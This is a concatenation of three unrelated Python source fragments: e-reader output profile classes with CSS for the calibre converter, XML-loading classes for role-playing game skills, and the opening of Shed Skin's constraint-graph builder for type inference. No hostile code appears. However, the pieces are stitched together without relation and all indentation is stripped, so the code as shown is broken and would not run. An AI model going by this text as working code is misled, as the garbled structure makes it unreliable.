'-webkit-border-top-left-radius':'{length}',
'-webkit-border-top-right-radius':'{length}',
'-webkit-border-radius': r'{border-width}(\s+{border-width}){0,3}|inherit',
},
'macros': {'border-width': '{length}|medium|thick|thin'}
}
]
ratings_char = u'\u2605' # filled star
empty_ratings_char = u'\u2606' # hollow star
touchscreen = True
# touchscreen_news_css {{{
touchscreen_news_css = u'''
/* hr used in articles */
.article_articles_list {
width:18%;
}
.article_link {
color: #593f29;
font-style: italic;
}
.article_next {
-webkit-border-top-right-radius:4px;
-webkit-border-bottom-right-radius:4px;
font-style: italic;
width:32%;
}
.article_prev {
-webkit-border-top-left-radius:4px;
-webkit-border-bottom-left-radius:4px;
font-style: italic;
width:32%;
}
.article_sections_list {
width:18%;
}
.articles_link {
font-weight: bold;
}
.sections_link {
font-weight: bold;
}
.caption_divider {
border:#ccc 1px solid;
}
.touchscreen_navbar {
background:#c3bab2;
border:#ccc 0px solid;
border-collapse:separate;
border-spacing:1px;
margin-left: 5%;
margin-right: 5%;
page-break-inside:avoid;
width: 90%;
-webkit-border-radius:4px;
}
.touchscreen_navbar td {
background:#fff;
font-family:Helvetica;
font-size:80%;
/* UI touchboxes use 8px padding */
padding: 6px;
text-align:center;
}
.touchscreen_navbar td a:link {
color: #593f29;
text-decoration: none;
}
/* Index formatting */
.publish_date {
text-align:center;
}
.divider {
border-bottom:1em solid white;
border-top:1px solid gray;
}
hr.caption_divider {
border-color:black;
border-style:solid;
border-width:1px;
}
/* Feed summary formatting */
.article_summary {
display:inline-block;
padding-bottom:0.5em;
}
.feed {
font-family:sans-serif;
font-weight:bold;
font-size:larger;
}
.feed_link {
font-style: italic;
}
.feed_next {
-webkit-border-top-right-radius:4px;
-webkit-border-bottom-right-radius:4px;
font-style: italic;
width:40%;
}
.feed_prev {
-webkit-border-top-left-radius:4px;
-webkit-border-bottom-left-radius:4px;
font-style: italic;
width:40%;
}
.feed_title {
text-align: center;
font-size: 160%;
}
.feed_up {
font-weight: bold;
width:20%;
}
.summary_headline {
font-weight:bold;
text-align:left;
}
.summary_byline {
text-align:left;
font-family:monospace;
}
.summary_text {
text-align:left;
}
'''
# }}}
class iPad3Output(iPadOutput):
screen_size = comic_screen_size = (2048, 1536)
dpi = 264.0
name = 'iPad 3'
short_name = 'ipad3'
description = _('Intended for the iPad 3 and similar devices with a '
'resolution of 1536x2048')
class TabletOutput(iPadOutput):
name = 'Tablet'
short_name = 'tablet'
description = _('Intended for generic tablet devices, does no resizing of images')
screen_size = (10000, 10000)
comic_screen_size = (10000, 10000)
class SamsungGalaxy(TabletOutput):
name = 'Samsung Galaxy'
short_name = 'galaxy'
description = _('Intended for the Samsung Galaxy and similar tablet devices with '
'a resolution of 600x1280')
screen_size = comic_screen_size = (600, 1280)
class NookHD(TabletOutput):
name = 'Nook HD+'
short_name = 'nook_hd_plus'
description = _('Intended for the Nook HD+ and similar tablet devices with '
'a resolution of 1280x1920')
screen_size = comic_screen_size = (1280, 1920)
class SonyReaderOutput(OutputProfile):
name = 'Sony Reader'
short_name = 'sony'
description = _('This profile is intended for the SONY PRS line. '
'The 500/505/600/700 etc.')
screen_size = (590, 775)
dpi = 168.451
fbase = 12
fsizes = [7.5, 9, 10, 12, 15.5, 20, 22, 24]
unsupported_unicode_chars = [u'\u201f', u'\u201b']
epub_periodical_format = 'sony'
# periodical_date_in_title = False
class KoboReaderOutput(OutputProfile):
name = 'Kobo Reader'
short_name = 'kobo'
description = _('This profile is intended for the Kobo Reader.')
screen_size = (536, 710)
comic_screen_size = (536, 710)
dpi = 168.451
fbase = 12
fsizes = [7.5, 9, 10, 12, 15.5, 20, 22, 24]
class SonyReader300Output(SonyReaderOutput):
author = 'John Schember'
name = 'Sony Reader 300'
short_name = 'sony300'
description = _('This profile is intended for the SONY PRS-300.')
dpi = 200
class SonyReader900Output(SonyReaderOutput):
author = 'John Schember'
name = 'Sony Reader 900'
short_name = 'sony900'
description = _('This profile is intended for the SONY PRS-900.')
screen_size = (600, 999)
comic_screen_size = screen_size
class SonyReaderT3Output(SonyReaderOutput):
author = 'Kovid Goyal'
name = 'Sony Reader T3'
short_name = 'sonyt3'
description = _('This profile is intended for the SONY PRS-T3.')
screen_size = (758, 934)
comic_screen_size = screen_size
class GenericEink(SonyReaderOutput):
name = 'Generic e-ink'
short_name = 'generic_eink'
description = _('Suitable for use with any e-ink device')
epub_periodical_format = None
class GenericEinkLarge(GenericEink):
name = 'Generic e-ink large'
short_name = 'generic_eink_large'
description = _('Suitable for use with any large screen e-ink device')
screen_size = (600, 999)
comic_screen_size = screen_size
class GenericEinkHD(GenericEink):
name = 'Generic e-ink HD'
short_name = 'generic_eink_hd'
description = _('Suitable for use with any modern high resolution e-ink device')
screen_size = (10000, 10000)
comic_screen_size = (10000, 10000)
class JetBook5Output(OutputProfile):
name = 'JetBook 5-inch'
short_name = 'jetbook5'
description = _('This profile is intended for the 5-inch JetBook.')
screen_size = (480, 640)
dpi = 168.451
class SonyReaderLandscapeOutput(SonyReaderOutput):
name = 'Sony Reader Landscape'
short_name = 'sony-landscape'
description = _('This profile is intended for the SONY PRS line. '
'The 500/505/700 etc, in landscape mode. Mainly useful '
'for comics.')
screen_size = (784, 1012)
comic_screen_size = (784, 1012)
class MSReaderOutput(OutputProfile):
name = 'Microsoft Reader'
short_name = 'msreader'
description = _('This profile is intended for the Microsoft Reader.')
screen_size = (480, 652)
dpi = 96
fbase = 13
fsizes = [10, 11, 13, 16, 18, 20, 22, 26]
class MobipocketOutput(OutputProfile):
name = 'Mobipocket Books'
short_name = 'mobipocket'
description = _('This profile is intended for the Mobipocket books.')
# Unfortunately MOBI books are not narrowly targeted, so this information is
# quite likely to be spurious
screen_size = (600, 800)
dpi = 96
fbase = 18
fsizes = [14, 14, 16, 18, 20, 22, 24, 26]
class HanlinV3Output(OutputProfile):
name = 'Hanlin V3'
short_name = 'hanlinv3'
description = _('This profile is intended for the Hanlin V3 and its clones.')
# Screen size is a best guess
screen_size = (584, 754)
dpi = 168.451
fbase = 16
fsizes = [12, 12, 14, 16, 18, 20, 22, 24]
class HanlinV5Output(HanlinV3Output):
name = 'Hanlin V5'
short_name = 'hanlinv5'
description = _('This profile is intended for the Hanlin V5 and its clones.')
dpi = 200
class CybookG3Output(OutputProfile):
name = 'Cybook G3'
short_name = 'cybookg3'
description = _('This profile is intended for the Cybook G3.')
# Screen size is a best guess
screen_size = (600, 800)
comic_screen_size = (600, 757)
dpi = 168.451
fbase = 16
fsizes = [12, 12, 14, 16, 18, 20, 22, 24]
class CybookOpusOutput(SonyReaderOutput):
author = 'John Schember'
name = 'Cybook Opus'
short_name = 'cybook_opus'
description = _('This profile is intended for the Cybook Opus.')
# Screen size is a best guess
dpi = 200
fbase = 16
fsizes = [12, 12, 14, 16, 18, 20, 22, 24]
epub_periodical_format = None
class KindleOutput(OutputProfile):
name = 'Kindle'
short_name = 'kindle'
description = _('This profile is intended for the Amazon Kindle.')
# Screen size is a best guess
screen_size = (525, 640)
dpi = 168.451
fbase = 16
fsizes = [12, 12, 14, 16, 18, 20, 22, 24]
supports_mobi_indexing = True
periodical_date_in_title = False
empty_ratings_char = u'\u2606'
ratings_char = u'\u2605'
mobi_ems_per_blockquote = 2.0
class KindleDXOutput(OutputProfile):
name = 'Kindle DX'
short_name = 'kindle_dx'
description = _('This profile is intended for the Amazon Kindle DX.')
# Screen size is a best guess
screen_size = (744, 1022)
dpi = 150.0
comic_screen_size = (771, 1116)
# comic_screen_size = (741, 1022)
supports_mobi_indexing = True
periodical_date_in_title = False
empty_ratings_char = u'\u2606'
ratings_char = u'\u2605'
mobi_ems_per_blockquote = 2.0
class KindlePaperWhiteOutput(KindleOutput):
name = 'Kindle PaperWhite'
short_name = 'kindle_pw'
description = _('This profile is intended for the Amazon Kindle PaperWhite 1 and 2')
# Screen size is a best guess
screen_size = (658, 940)
dpi = 212.0
comic_screen_size = screen_size
class KindleVoyageOutput(KindleOutput):
name = 'Kindle Voyage'
short_name = 'kindle_voyage'
description = _('This profile is intended for the Amazon Kindle Voyage')
# Screen size is currently just the spec size, actual renderable area will
# depend on someone with the device doing tests.
screen_size = (1080, 1430)
dpi = 300.0
comic_screen_size = screen_size
class KindlePaperWhite3Output(KindleVoyageOutput):
name = 'Kindle PaperWhite 3'
short_name = 'kindle_pw3'
description = _('This profile is intended for the Amazon Kindle PaperWhite 3 and above')
# Screen size is currently just the spec size, actual renderable area will
# depend on someone with the device doing tests.
screen_size = (1072, 1430)
dpi = 300.0
comic_screen_size = screen_size
class KindleFireOutput(KindleDXOutput):
name = 'Kindle Fire'
short_name = 'kindle_fire'
description = _('This profile is intended for the Amazon Kindle Fire.')
screen_size = (570, 1016)
dpi = 169.0
comic_screen_size = (570, 1016)
class IlliadOutput(OutputProfile):
name = 'Illiad'
short_name = 'illiad'
description = _('This profile is intended for the Irex Illiad.')
screen_size = (760, 925)
comic_screen_size = (760, 925)
dpi = 160.0
fbase = 12
fsizes = [7.5, 9, 10, 12, 15.5, 20, 22, 24]
class IRexDR1000Output(OutputProfile):
author = 'John Schember'
name = 'IRex Digital Reader 1000'
short_name = 'irexdr1000'
description = _('This profile is intended for the IRex Digital Reader 1000.')
# Screen size is a best guess
screen_size = (1024, 1280)
comic_screen_size = (996, 1241)
dpi = 160
fbase = 16
fsizes = [12, 14, 16, 18, 20, 22, 24]
class IRexDR800Output(OutputProfile):
author = 'Eric Cronin'
name = 'IRex Digital Reader 800'
short_name = 'irexdr800'
description = _('This profile is intended for the IRex Digital Reader 800.')
# Screen size is a best guess
screen_size = (768, 1024)
comic_screen_size = (768, 1024)
dpi = 160
fbase = 16
fsizes = [12, 14, 16, 18, 20, 22, 24]
class NookOutput(OutputProfile):
author = 'John Schember'
name = 'Nook'
short_name = 'nook'
description = _('This profile is intended for the B&N Nook.')
# Screen size is a best guess
screen_size = (600, 730)
comic_screen_size = (584, 730)
dpi = 167
fbase = 16
fsizes = [12, 12, 14, 16, 18, 20, 22, 24]
class NookColorOutput(NookOutput):
name = 'Nook Color'
short_name = 'nook_color'
description = _('This profile is intended for the B&N Nook Color.')
screen_size = (600, 900)
comic_screen_size = (594, 900)
dpi = 169
class PocketBook900Output(OutputProfile):
author = 'Chris Lockfort'
name = 'PocketBook Pro 900'
short_name = 'pocketbook_900'
description = _('This profile is intended for the PocketBook Pro 900 series of devices.')
screen_size = (810, 1180)
dpi = 150.0
comic_screen_size = screen_size
class PocketBookPro912Output(OutputProfile):
author = 'Daniele Pizzolli'
name = 'PocketBook Pro 912'
short_name = 'pocketbook_pro_912'
description = _('This profile is intended for the PocketBook Pro 912 series of devices.')
# According to http://download.pocketbook-int.com/user-guides/E_Ink/912/User_Guide_PocketBook_912(EN).pdf
screen_size = (825, 1200)
dpi = 155.0
comic_screen_size = screen_size
output_profiles = [
OutputProfile, SonyReaderOutput, SonyReader300Output, SonyReader900Output,
SonyReaderT3Output, MSReaderOutput, MobipocketOutput, HanlinV3Output,
HanlinV5Output, CybookG3Output, CybookOpusOutput, KindleOutput, iPadOutput,
iPad3Output, KoboReaderOutput, TabletOutput, SamsungGalaxy,
SonyReaderLandscapeOutput, KindleDXOutput, IlliadOutput, NookHD,
IRexDR1000Output, IRexDR800Output, JetBook5Output, NookOutput,
NookColorOutput, PocketBook900Output,
PocketBookPro912Output, GenericEink, GenericEinkLarge, GenericEinkHD,
KindleFireOutput, KindlePaperWhiteOutput, KindleVoyageOutput,
KindlePaperWhite3Output
]
output_profiles.sort(cmp=lambda x,y:cmp(x.name.lower(), y.name.lower()))
|
class MasteryAbility(object):
@staticmethod
def build_from_xml(elem):
f = MasteryAbility()
f.rank = int(elem.attrib['rank'])
f.rule = elem.attrib['rule'] if ('rule' in elem.attrib) else None
f.desc = elem.text
return f
class SkillCateg(object):
@staticmethod
def build_from_xml(elem):
f = SkillCateg()
f.id = elem.attrib['id']
f.name = elem.text
return f
def __str__(self):
return self.name
def __unicode__(self):
return self.name
def __eq__(self, obj):
return obj and obj.id == self.id
def __ne__(self, obj):
return not self.__eq__(obj)
def __hash__(self):
return self.id.__hash__()
class Skill(object):
@staticmethod
def build_from_xml(elem):
f = Skill()
f.name = elem.attrib['name']
f.id = elem.attrib['id']
f.trait = elem.attrib['trait']
f.type = elem.attrib['type']
f.tags = [f.type]
if elem.find('Tags'):
for se in elem.find('Tags').iter():
if se.tag == 'Tag':
f.tags.append(se.text)
f.mastery_abilities = []
if elem.find('MasteryAbilities'):
for se in elem.find('MasteryAbilities').iter():
if se.tag == 'MasteryAbility':
f.mastery_abilities.append(MasteryAbility.build_from_xml(se))
return f
def __str__(self):
return self.name or self.id
def __unicode__(self):
return self.name
def __eq__(self, obj):
return obj and obj.id == self.id
def __ne__(self, obj):
return not self.__eq__(obj)
def __hash__(self):
return self.id.__hash__()
|
'''
*** SHED SKIN Python-to-C++ Compiler ***
Copyright 2005-2013 Mark Dufour; License GNU GPL version 3 (See LICENSE)
graph.py: build constraint graph used in dataflow analysis
constraint graph: graph along which possible types 'flow' during an 'abstract execution' of a program (a dataflow analysis). consider the assignment statement 'a = b'. it follows that the set of possible types of b is smaller than or equal to that of a (a constraint). we can determine possible types of a, by 'flowing' the types from b to a, in other words, along the constraint.
constraint graph nodes are stored in gx.cnode, and the set of types of for each node in gx.types. nodes are identified by an AST Node, and two integers. the integers are used in py to duplicate parts of the constraint graph along two dimensions. in the initial constraint graph, these integers are always 0.
class ModuleVisitor: inherits visitor pattern from compiler.visitor.ASTVisitor, to recursively generate constraints for each syntactical Python construct. for example, the visitFor method is called in case of a for-loop. temporary variables are introduced in many places, to enable translation to a lower-level language.
parse_module(): locate module by name (e.g. 'os.path'), and use ModuleVisitor if not cached
'''
import copy
import os
import re
import sys
from compiler.ast import Const, AssTuple, AssList, From, Add, ListCompFor, \
UnaryAdd, Import, Bitand, Stmt, Assign, FloorDiv, Not, Mod, AssAttr, \
Keyword, GenExpr, LeftShift, AssName, Div, Or, Lambda, And, CallFunc, \
Global, Slice, RightShift, Sub, Getattr, Dict, Ellipsis, Mul, \
Subscript, Function as FunctionNode, Return, Power, Bitxor, Class as ClassNode, Name, List, \
Discard, Sliceobj, Tuple, Pass, UnarySub, Bitor, ListComp, TryExcept, With
from compiler.visitor import ASTVisitor
from error import error
from infer import inode, in_out, CNode, default_var, register_temp_var
from python import StaticClass, lookup_func, Function, is_zip2, \
lookup_class, is_method, is_literal, is_enum, lookup_var, assign_rec, \
Class, is_property_setter, is_fastfor, aug_msg, is_isinstance, \
Module, def_class, parse_file, find_module
_mv = None
def setmv(mv):
global _mv
_mv = mv
return _mv
def getmv():
return _mv
class FakeGetattr3(Getattr):
pass
class FakeGetattr2(Getattr):
pass
class FakeGetattr(Getattr):
pass # XXX ugly
def check_redef(gx, node, s=None, onlybuiltins=False): # XXX to modvisitor, rewrite
if not getmv().module.builtin:
existing = [getmv().ext_classes, getmv().ext_funcs]
if not onlybuiltins:
existing += [getmv().classes, getmv().funcs]
for whatsit in existing:
if s is not None:
name = s
else:
name = node.name
if name in whatsit:
error("function/class redefinition is not supported", gx, node, mv=getmv())
def inherit_rec(gx, original, copy, mv):
gx.inheritance_relations.setdefault(original, []).append(copy)
gx.inherited.add(copy)
gx.parent_nodes[copy] = original
for (a, b) in zip(original.getChildNodes(), copy.getChildNodes()):
inherit_rec(gx, a, b, mv)
def register_node(node, func):
if func:
func.registered.append(node)
def slice_nums(nodes):
nodes2 = []
x = 0
for i, n in enumerate(nodes):
if not n or (isinstance(n, Const) and n.value is None):
nodes2.append(Const(0))
else:
nodes2.append(n)
x |= (1 << i)
return [Const(x)] + nodes2
class ModuleVisitor(ASTVisitor):
def __init__(self, module, gx):
ASTVisitor.__init__(self)
self.module = module
self.gx = gx
self.classes = {}
self.funcs = {}
self.globals = {}
self.exc_names = {}
self.current_with_vars = []
self.lambdas = {}
self.imports = {}
self.fake_imports = {}
self.ext_classes = {}
self.ext_funcs = {}
self.lambdaname = {}
self.lwrapper = {}
self.tempcount = self.gx.tempcount
self.callfuncs = []
self.for_in_iters = []
self.listcomps = []
self.defaults = {}
self.importnodes = []
def dispatch(self, node, *args):
if (node, 0, 0) not in self.gx.cnode:
ASTVisitor.dispatch(self, node, *args)
def fake_func(self, node, objexpr, attrname, args, func):
if (node, 0, 0) in self.gx.cnode: # XXX
newnode = self.gx.cnode[node, 0, 0]
else:
newnode = CNode(self.gx, node, parent=func, mv=getmv())
self.gx.types[newnode] = set()
fakefunc = CallFunc(Getattr(objexpr, attrname), args)
fakefunc.lineno = objexpr.lineno
self.visit(fakefunc, func)
self.add_constraint((inode(self.gx, fakefunc), newnode), func)
inode(self.gx, objexpr).fakefunc = fakefunc
return fakefunc
# simple heuristic for initial list split: count nesting depth, first constant child type
def list_type(self, node):
count = 0
child = node
while isinstance(child, (List, ListComp)):
if not child.getChildNodes():
return None
child = child.getChildNodes()[0]
count += 1
if isinstance(child, (UnarySub, UnaryAdd)):
child = child.expr
if isinstance(child, CallFunc) and isinstance(child.node, Name):
map = {'int': int, 'str': str, 'float': float}
if child.node.name in ('range'): # ,'xrange'):
count, child = count + 1, int
elif child.node.name in map:
child = map[child.node.name]
elif child.node.name in (cl.ident for cl in self.gx.allclasses) or child.node.name in getmv().classes: # XXX getmv().classes
child = child.node.name
else:
if count == 1:
return None
child = None
elif isinstance(child, Const):
child = type(child.value)
elif isinstance(child, Name) and child.name in ('True', 'False'):
child = bool
elif isinstance(child, Tuple):
child = tuple
elif isinstance(child, Dict):
child = dict
else:
if count == 1:
return None
child = None
self.gx.list_types.setdefault((count, child), len(self.gx.list_types) + 2)
# print 'listtype', node, self.gx.list_types[count, child]
return self.gx.list_types[count, child]
def instance(self, node, cl, func=None):
if (node, 0, 0) in self.gx.cnode: # XXX to create_node() func
newnode = self.gx.cnode[node, 0, 0]
else:
newnode = CNode(self.gx, node, parent=func, mv=getmv())
newnode.constructor = True
if cl.ident in ['int_', 'float_', 'str_', 'none', 'class_', 'bool_']:
self.gx.types[newnode] = set([(cl, cl.dcpa - 1)])
else:
if cl.ident == 'list' and self.list_type(node):
self.gx.types[newnode] = set([(cl, self.list_type(node))])
else:
self.gx.types[newnode] = set([(cl, cl.dcpa)])
def constructor(self, node, classname, func):
cl = def_class(self.gx, classname)
self.instance(node, cl, func)
default_var(self.gx, 'unit', cl)
if classname in ['list', 'tuple'] and not node.nodes:
self.gx.empty_constructors.add(node) # ifa disables those that flow to instance variable assignments
# --- internally flow binary tuples
if cl.ident == 'tuple2':
default_var(self.gx, 'first', cl)
default_var(self.gx, 'second', cl)
elem0, elem1 = node.nodes
self.visit(elem0, func)
self.visit(elem1, func)
self.add_dynamic_constraint(node, elem0, 'unit', func)
self.add_dynamic_constraint(node, elem1, 'unit', func)
self.add_dynamic_constraint(node, elem0, 'first', func)
self.add_dynamic_constraint(node, elem1, 'second', func)
return
# --- add dynamic children constraints for other types
if classname == 'dict': # XXX filter children
default_var(self.gx, 'unit', cl)
default_var(self.gx, 'value', cl)
for child in node.getChildNodes():
self.visit(child, func)
for (key, value) in node.items: # XXX filter
self.add_dynamic_constraint(node, key, 'unit', func)
self.add_dynamic_constraint(node, value, 'value', func)
else:
for child in node.nodes:
self.visit(child, func)
for child in self.filter_redundant_children(node):
self.add_dynamic_constraint(node, child, 'unit', func)
# --- for compound list/tuple/dict constructors, we only consider a single child node for each subtype
def filter_redundant_children(self, node):
done = set()
nonred = []
for child in node.nodes:
type = self.child_type_rec(child)
if not type or not type in done:
done.add(type)
nonred.append(child)
return nonred
# --- determine single constructor child node type, used by the above
def child_type_rec(self, node):
if isinstance(node, (UnarySub, UnaryAdd)):
node = node.expr
if isinstance(node, (List, Tuple)):
if isinstance(node, List):
cl = def_class(self.gx, 'list')
elif len(node.nodes) == 2:
cl = def_class(self.gx, 'tuple2')
else:
cl = def_class(self.gx, 'tuple')
merged = set()
for child in node.nodes:
merged.add(self.child_type_rec(child))
if len(merged) == 1:
return (cl, merged.pop())
elif isinstance(node, Const):
return (list(inode(self.gx, node).types())[0][0],)
# --- add dynamic constraint for constructor argument, e.g. '[expr]' becomes [].__setattr__('unit', expr)
def add_dynamic_constraint(self, parent, child, varname, func):
# print 'dynamic constr', child, parent
self.gx.assign_target[child] = parent
cu = Const(varname)
self.visit(cu, func)
fakefunc = CallFunc(FakeGetattr2(parent, '__setattr__'), [cu, child])
self.visit(fakefunc, func)
fakechildnode = CNode(self.gx, (child, varname), parent=func, mv=getmv()) # create separate 'fake' CNode per child, so we can have multiple 'callfuncs'
self.gx.types[fakechildnode] = set()
self.add_constraint((inode(self.gx, parent), fakechildnode), func) # add constraint from parent to fake child node. if parent changes, all fake child nodes change, and the callfunc for each child node is triggered
fakechildnode.callfuncs.append(fakefunc)
# --- add regular constraint to function
def add_constraint(self, constraint, func):
in_out(constraint[0], constraint[1])
self.gx.constraints.add(constraint)
while isinstance(func, Function) and func.listcomp:
func = func.parent # XXX
if isinstance(func, Function):
func.constraints.add(constraint)
def struct_unpack(self, rvalue, func):
if isinstance(rvalue, CallFunc):
if isinstance(rvalue.node, Getattr) and isinstance(rvalue.node.expr, Name) and rvalue.node.expr.name == 'struct' and rvalue.node.attrname == 'unpack' and lookup_var('struct', func, mv=self).imported: # XXX imported from where?
return True
elif isinstance(rvalue.node, Name) and rvalue.node.name == 'unpack' and 'unpack' in self.ext_funcs and not lookup_var('unpack', func, mv=self): # XXX imported from where?
return True
def struct_info(self, node, func):
if isinstance(node, Name):
var = lookup_var(node.name, func, mv=self) # XXX fwd ref?
if not var or len(var.const_assign) != 1:
error('non-constant format string', self.gx, node, mv=self)
error('assuming constant format string', self.gx, node, mv=self, warning=True)
fmt = var.const_assign[0].value
elif isinstance(node, Const):
fmt = node.value
else:
error('non-constant format string', self.gx, node, mv=self)
char_type = dict(['xx', 'cs', 'bi', 'Bi', '?b', 'hi', 'Hi', 'ii', 'Ii', 'li', 'Li', 'qi', 'Qi', 'ff', 'df', 'ss', 'ps'])
ordering = '@'
if fmt and fmt[0] in '@<>!=':
ordering, fmt = fmt[0], fmt[1:]
result = []
digits = ''
for i, c in enumerate(fmt):
if c.isdigit():
digits += c
elif c in char_type:
rtype = {'i': 'int', 's': 'str', 'b': 'bool', 'f': 'float', 'x': 'pad'}[char_type[c]]
if rtype == 'str' and c != 'c':
result.append((ordering, c, 'str', int(digits or '1')))
elif digits == '0':
result.append((ordering, c, rtype, 0))
else:
result.extend(int(digits or '1') * [(ordering, c, rtype, 1)])
digits = ''
else:
error('bad or unsupported char in struct format: ' + repr(c), self.gx, node, mv=self)
digits = ''
return result
def struct_faketuple(self, info):
result = []
for o, c, t, d in info:
if d != 0 or c == 's':
if t == 'int':
result.append(Const(1))
elif t == 'str':
result.append(Const(''))
elif t == 'float':
result.append(Const(1.0))
elif t == 'bool':
result.append(Name('True'))
return Tuple(result)
def visitExec(self, node, func=None):
error("'exec' is not supported", self.gx, node, mv=getmv())
def visitGenExpr(self, node, func=None):
newnode = CNode(self.gx, node, parent=func, mv=getmv())
self.gx.types[newnode] = set()
lc = ListComp(node.code.expr, [ListCompFor(qual.assign, qual.iter, qual.ifs, qual.lineno) for qual in node.code.quals], lineno=node.lineno)
register_node(lc, func)
self.gx.genexp_to_lc[node] = lc
self.visit(lc, func)
self.add_constraint((inode(self.gx, lc), newnode), func)
def visitStmt(self, node, func=None):
comments = []
for b in node.nodes:
if isinstance(b, Discard):
self.bool_test_add(b.expr)
if isinstance(b, Discard) and isinstance(b.expr, Const) and type(b.expr.value) == str:
comments.append(b.expr.value)
elif comments:
self.gx.comments[b] = comments
comments = []
self.visit(b, func)
def visitModule(self, node):
# --- bootstrap built-in classes
if self.module.ident == 'builtin':
for dummy in self.gx.builtins:
self.visit(ClassNode(dummy, [], None, Pass()))
if self.module.ident != 'builtin':
n = From('builtin', [('*', None)], None) # Python2.5+
getmv().importnodes.append(n)
self.visit(n)
# --- __name__
if self.module.ident != 'builtin':
namevar = default_var(self.gx, '__name__', None, mv=getmv())
self.gx.types[inode(self.gx, namevar)] = set([(def_class(self.gx, 'str_'), 0)])
self.forward_references(node)
# --- visit children
for child in node.getChildNodes():
if isinstance(child, Stmt):
getmv().importnodes.extend(n for n in child.nodes if isinstance(n, (Import, From)))
self.visit(child, None)
# --- register classes
for cl in getmv().classes.values():
self.gx.allclasses.add(cl)
# --- inheritance expansion
# determine base classes
for cl in self.classes.values():
for base in cl.node.bases:
if not (isinstance(base, Name) and base.name == 'object'):
ancestor = lookup_class(base, getmv())
cl.bases.append(ancestor)
ancestor.children.append(cl)
# for each base class, duplicate methods
for cl in self.classes.values():
for ancestor in cl.ancestors_upto(None)[1:]:
cl.staticmethods.extend(ancestor.staticmethods)
cl.properties.update(ancestor.properties)
for func in ancestor.funcs.values():
if not func.node or func.inherited:
continue
ident = func.ident
if ident in cl.funcs:
ident += ancestor.ident + '__'
# deep-copy AST function nodes
func_copy = copy.deepcopy(func.node)
inherit_rec(self.gx, func.node, func_copy, func.mv)
tempmv, mv = getmv(), func.mv
setmv(mv)
self.visitFunction(func_copy, cl, inherited_from=ancestor)
mv = tempmv
setmv(mv)
# maintain relation with original
self.gx.inheritance_relations.setdefault(func, []).append(cl.funcs[ident])
cl.funcs[ident].inherited = func.node
cl.funcs[ident].inherited_from = func
func_copy.name = ident
if ident == func.ident:
cl.funcs[ident + ancestor.ident + '__'] = cl.funcs[ident]
def stmt_nodes(self, node, cl):
result = []
for child in node.getChildNodes():
if isinstance(child, Stmt):
for n in child.nodes:
if isinstance(n, cl):
result.append(n)
return result
def forward_references(self, node):
getmv().classnodes = []
# classes
for n in self.stmt_nodes(node, ClassNode):
check_redef(self.gx, n)
getmv().classnodes.append(n)
newclass = Class(self.gx, n, getmv())
self.classes[n.name] = newclass
getmv().classes[n.name] = newclass
newclass.module = self.module
newclass.parent = StaticClass(newclass, getmv())
# methods
for m in self.stmt_nodes(n, FunctionNode):
if hasattr(m, 'decorators') and m.decorators and [dec for dec in m.decorators if is_property_setter(dec)]:
m.name = m.name + '__setter__'
if m.name in newclass.funcs: # and func.ident not in ['__getattr__', '__setattr__']: # XXX
error("function/class redefinition is not allowed", self.gx, m, mv=getmv())
func = Function(self.gx, m, newclass, mv=getmv())
newclass.funcs[func.ident] = func
self.set_default_vars(m, func)
# functions
getmv().funcnodes = []
for n in self.stmt_nodes(node, FunctionNode):
check_redef(self.gx, n)
getmv().funcnodes.append(n)
func = getmv().funcs[n.name] = Function(self.gx, n, mv=getmv())
self.set_default_vars(n, func)
# global variables XXX visitGlobal
for assname in self.local_assignments(node, global_=True):
default_var(self.gx, assname.name, None, mv=getmv())
def set_default_vars(self, node, func):
globals = set(self.get_globals(node))
for assname in self.local_assignments(node):
if assname.name not in globals:
default_var(self.gx, assname.name, func)
def get_globals(self, node):
if isinstance(node, Global):
result = node.names
else:
result = []
for child in node.getChildNodes():
result.extend(self.get_globals(child))
return result
def local_assignments(self, node, global_=False):
if global_ and isinstance(node, (ClassNode, FunctionNode)):
return []
elif isinstance(node, (ListComp, GenExpr)):
return []
elif isinstance(node, AssName):
result = [node]
else:
# Try-Excepts introduce a new small scope with the exception name,
# so we skip it here.
if isinstance(node, TryExcept):
children = list(node.body.getChildNodes())
for handler in node.handlers:
children.extend(handler[2].getChildNodes())
if node.else_:
children.extend(node.else_.getChildNodes())
elif isinstance(node, With):
children = node.body.getChildNodes()
else:
children = node.getChildNodes()
result = []
for child in children:
result.extend(self.local_assignments(child, global_))
return result
def visitImport(self, node, func=None):
if not node in getmv().importnodes:
error("please place all imports (no 'try:' etc) at the top of the file", self.gx, node, mv=getmv())
for (name, pseudonym) in node.names:
if pseudonym:
# --- import a.b as c: don't import a
self.import_module(name, pseudonym, node, False)
else:
self.import_modules(name, node, False)
def import_modules(self, name, node, fake):
# --- import a.b.c: import a, then a.b, then a.b.c
split = name.split('.')
module = getmv().module
for i in range(len(split)):
subname = '.'.join(split[:i + 1])
parent = module
module = self.import_module(subname, subname, node, fake)
if module.ident not in parent.mv.imports: # XXX
if not fake:
parent.mv.imports[module.ident] = module
return module
def import_module(self, name, pseudonym, node, fake):
module = self.analyze_module(name, pseudonym, node, fake)
if not fake:
var = default_var(self.gx, pseudonym or name, None, mv=getmv())
var.imported = True
self.gx.types[inode(self.gx, var)] = set([(module, 0)])
return module
def visitFrom(self, node, parent=None):
if not node in getmv().importnodes: # XXX use (func, node) as parent..
error("please place all imports (no 'try:' etc) at the top of the file", self.gx, node, mv=getmv())
if hasattr(node, 'level') and node.level:
error("relative imports are not supported", self.gx, node, mv=getmv())
if node.modname == '__future__':
for name, _ in node.names:
if name not in ['with_statement', 'print_function']:
error("future '%s' is not yet supported" % name, self.gx, node, mv=getmv())
return
module = self.import_modules(node.modname, node, True)
self.gx.from_module[node] = module
for name, pseudonym in node.names:
if name == '*':
self.ext_funcs.update(module.mv.funcs)
self.ext_classes.update(module.mv.classes)
for import_name, import_module in module.mv.imports.items():
var = default_var(self.gx, import_name, None, mv=getmv()) # XXX merge
var.imported = True
self.gx.types[inode(self.gx, var)] = set([(import_module, 0)])
self.imports[import_name] = import_module
for name, extvar in module.mv.globals.items():
if not extvar.imported and not name in ['__name__']:
var = default_var(self.gx, name, None, mv=getmv()) # XXX merge
var.imported = True
self.add_constraint((inode(self.gx, extvar), inode(self.gx, var)), None)
continue
path = module.path
pseudonym = pseudonym or name
if name in module.mv.funcs:
self.ext_funcs[pseudonym] = module.mv.funcs[name]
elif name in module.mv.classes:
self.ext_classes[pseudonym] = module.mv.classes[name]
elif name in module.mv.globals and not module.mv.globals[name].imported: # XXX
extvar = module.mv.globals[name]
var = default_var(self.gx, pseudonym, None, mv=getmv())
var.imported = True
self.add_constraint((inode(self.gx, extvar), inode(self.gx, var)), None)
